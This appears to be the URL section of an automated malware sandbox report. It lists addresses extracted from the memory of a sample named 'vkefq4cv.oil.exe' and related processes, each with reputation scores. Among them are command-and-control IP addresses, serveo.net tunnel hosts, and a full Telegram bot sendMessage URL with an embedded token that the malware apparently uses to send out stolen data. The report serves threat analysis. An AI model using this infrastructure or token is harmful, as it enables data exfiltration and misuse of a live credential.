                                http://216.250.190.139:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                • 8%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                		unknown
                                https://duckduckgo.com/chrome_newtabvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://23.224.102.6:8001vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.telegram.org/botvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://e2111f95f52ba8be6b2d3394e38b1722.sevkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.119.118.59:8080vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 1%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_uservkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://107.161.20.142:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 3%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.119.118.59:80802vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 1%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_uservkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://13.231.21.109:443vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://192.99.196.191:443vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 4%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://e483612b93e055308d0c85f365c474ee.serveo.net/ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000021.00000002.4113726250.0000029260842000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://66.42.56.128:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 9%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://ip-api.comvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=51697vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://64.227.21.98:443vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997F9F000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A001B2000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B62000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1912000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://185.119.118.59:8080/getvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 1%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_uservkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://129.151.109.160:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 3%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://127.0.0.1:6787/vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, hahahahaha.txt.18.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://82.147.85jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		low
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmptrue
                                                • URL Reputation: malware
                                                		unknown
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01A44000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D17F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/Iconpowershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://23.248.176.37:180vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 1%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://ip-api.com/line?fields=queryvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://185.119.118.59:8080/hkLYW_user%40468325_report.wsrvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.ecosia.org/newtab/vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://185.119.118.59vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • 0%, Virustotal, Browse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://127.0.0.1:vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://45.61.136.52:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • 0%, Virustotal, Browse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B33000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D18E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.netvkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://185.119.118.59:8080/hkLYW_uservkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://45.61.136.13:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • 2%, Virustotal, Browse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://api.telegram.orgvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://154.26.128.6:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://212.6.44.53:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • 1%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://185.217.98.121:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • 15%, Virustotal, Browse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://api.telegram.orgvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://contoso.com/Licensepowershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessagevkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://44.228.161.50:443vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 2%, Virustotal, Browse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                http://104.248.208.221:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 1%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://164.90.185.9:443vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 9%, Virustotal, Browse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                http://www.w3.vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD78E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://18.228.80.130:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • 11%, Virustotal, Browse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://contoso.com/powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://185.217.98.121:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • 11%, Virustotal, Browse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://193.142.58.127:80Pkvkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		low
                                                                                        https://e2111f95f52ba8be6b2d3394e38b1722.serveo.netvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://e483612b93e055308d0c85f365c474ee.serveo.netvkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icovkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
